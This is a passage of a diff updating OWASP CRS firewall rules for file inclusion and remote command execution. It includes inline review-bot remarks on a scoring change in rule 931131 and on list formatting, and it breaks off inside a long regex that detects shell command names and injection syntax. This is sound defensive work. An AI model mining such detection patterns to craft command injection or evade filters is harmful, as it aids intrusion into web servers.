-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -177,22 +176,22 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-LFI',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index 1b7ff0f58c..0edf9a5306 100644
--- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -17,8 +17,8 @@
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -55,7 +55,7 @@ SecRule ARGS|XML:/* "@rx (?i)^(file|ftps?|https?|ssh)://(?:\[?[a-f0-9]+:[a-f0-9:
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RFI',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -76,7 +76,7 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RFI',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -97,15 +97,15 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RFI',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -137,7 +137,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RFI',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
 chain"
@@ -145,7 +145,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it
 "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-# This is a (stricter) sibling of 931130.
+# This is a sibling of 931130.
 #
 # Regular expression generated from regex-assembly/931131.ra.
 # To update the regular expression run the following shell script
@@ -158,7 +158,7 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
 block,\
 capture,\
 t:none,t:urlDecodeUni,\
- msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\
+ msg:'Possible Remote File Inclusion (RFI) Attack',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-multi',\
@@ -168,25 +168,21 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RFI',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
- setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
- chain"
- SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \
- "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
index 5c78ef76eb..28b1b01c58 100644
--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -14,8 +14,8 @@
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
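Review bot: With the host-comparison chain removed, 931131 no longer increments `tx.rfi_score`: the deleted chained rule set both `tx.rfi_score` and `tx.inbound_anomaly_score_pl2`, and the replacement action line keeps only the latter, whereas 931100 and 931130 in this file (the `@@ -55,7` and `@@ -145,7` hunks) still add to `tx.rfi_score`, so the per-category score now undercounts for this rule. Unless dropping it is intended, the new action should read `setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\` followed by `setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"`. The msg change and the `# This is a sibling of 931130.` comment suggest the rule now scores every matching URL in REQUEST_FILENAME, including ones pointing at the request's own host, on purpose; a line such as `# Unlike 931130, this rule does not exempt URLs on the request's own host.` would record that difference for the next reader. The start of the 931131 action block lies outside this hunk.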
@@ -94,6 +94,8 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'O
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
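Review bot: The two added list entries write the paranoia level as `PL-1` and `PL-3` while every surrounding entry writes `PL1`, `PL2`; keep one form, e.g. `# .932340 (base rule, PL1, matches commands with no arguments)`. The list also appears to be grouped by paranoia level, with `.932240` opening the PL2 entries after the blank `#`, so the `.932350` entry, being PL3, presumably belongs in a later group rather than between the PL1 rules.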
@@ -119,7 +121,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'O # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932230 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\
|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'
\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x
5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[